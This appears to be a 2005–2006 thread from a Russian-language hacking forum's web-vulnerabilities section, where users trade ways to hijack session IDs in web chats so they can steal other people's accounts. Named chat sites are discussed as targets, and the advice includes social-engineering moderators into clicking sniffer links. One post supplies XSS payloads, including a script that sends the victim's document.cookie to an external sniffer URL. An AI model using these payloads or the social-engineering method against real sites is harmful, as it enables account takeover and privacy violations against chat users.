Чаты Voodoo чаты

Discussion in 'Веб-уязвимости' started by bugaga, 27 Nov 2005.

  1. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    млин объясните наконец как перехватыывать Id сессии
     
  2. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
  3. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    2 Night_wolf
    хех тады такой воопрос.
    чё за сниффер ты юзал?
     
  4. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Античатовский =)
     
  5. mw_nfs

    mw_nfs New Member

    Joined:
    1 Dec 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите с чатом на дыры,его адрес www.primochka.ru.За ранее спасибо
     
  6. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    млин.. совсем лоховской воопрос... какой параметр в сниффере нада вбить шоб на него Id отсылался.. а то я тут парюсь а у мя нихрена ни выходит
     
  7. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    В снифере ничего менять не надо !!!
    Просто ссылку на него в профиль себе поставь и направляй туда пользователей.
     
  8. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    2 Night_wolf
    зделал и чего получаю голый Ipшник...
    :mad:

    а нужен ID сессии
     
    #68 Gho_st, 23 Dec 2005
    Last edited: 23 Dec 2005
  9. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Если какойта юзер нажал но ту сылку где находится снифф,то снифер должен паймать всё, значить ты что-то не так делаеш.
     
    #69 Tem, 23 Dec 2005
    Last edited: 23 Dec 2005
  10. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    я на себе тестил.. ну жму на эту ссылку.. и что дальше, дальше в сниффер выдает мне только мой Ip...

    ни Id ни даже аддреса откуда я пришол я так и не увидел
     
    #70 Gho_st, 23 Dec 2005
    Last edited: 23 Dec 2005
  11. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Дай адресок чата, я гляну.
    Там скорее всего идёт пересылка через пустую страницу, тоесть если ссылку в чате открываешь то она не с самого чата открываеться а сначала страница пустая, а потом уже на сниффер идёт, таким образом сессия и не определяеться.
     
  12. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    2 NIGHT_WOLF
    пробовал на chat.gameguru.ru
    хех да там открывается пустая страница с ввв.чат.ку/go?url=аддрес
     
  13. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Вот я о чём и говорю...
    Можешь воспользоваться флудером =)
     
  14. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    2 Night_wolf
    хех юзал я этот флудек как-то...
    нее мне не сколько напакастить надо сколько спереть один аккаунт
     
  15. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Привет ребятки. попробуйте так сделать.
    Короче впихаете в гифку одну из этих скриптов
    Code:
    <a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a> 
    Code:
    <img src="http://antichat.ru/cgi-bin/s.jpg">
    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
    и загружаете в инфо , потом открываете свойства и берете полнуй путь к гифу, этот адрес пишете в место где вы должны указать ваш URL и инфо , если есть вазможность то скрывайте гифку кот не открывается т.е на чем стоит крестик ...потом уже вам придеться использовать СИ что бы мёдр нажал на линк ...Во всяком случае у меня так получился перехватить сессию здесь пример
     
  16. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Ну это как посмотреть ...ели ты имеешь виду C или С++ то они мееют связь с Php но если ты имеешь СИ ( Соц Инженерия) то это не имеет как ты уже отметил "японский и турецким".
     
  17. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    хех перехватил тут куки в ВОК++ вощем там как я понял был хеш чейто
    поскажите чем его расшифровать
     
  18. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Это сессия !!!
    Она не расшифровываеться.
     
  19. Gho_st

    Gho_st Elder - Старейшина

    Joined:
    24 Jun 2005
    Messages:
    79
    Likes Received:
    9
    Reputations:
    3
    2 Night_wolf
    нет это не сессия
    я её сверил с той что в Html коде просматривается
     
  20. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Сессии то разные например:
    069d16677e19bd47fa94786c89e9a5d5
    или
    413535e8ea5ae7d615ef239b4f383ba6
    или
    50fe88f4b05b05fdcb0a51dc59af03f1

    Это примеры с реального чата, они не расшифровываються. А ты чем вылавливал и что вообще именно ты получил. Скопируй сюда посмотрим.
    ***
    А вот есть у кого нибудь БОТ которого можно подвесить под своим именем и чтобы когда тебя нет он висел в чате ?
     
    #80 NIGHT_WOLF, 11 Jan 2006
    Last edited: 11 Jan 2006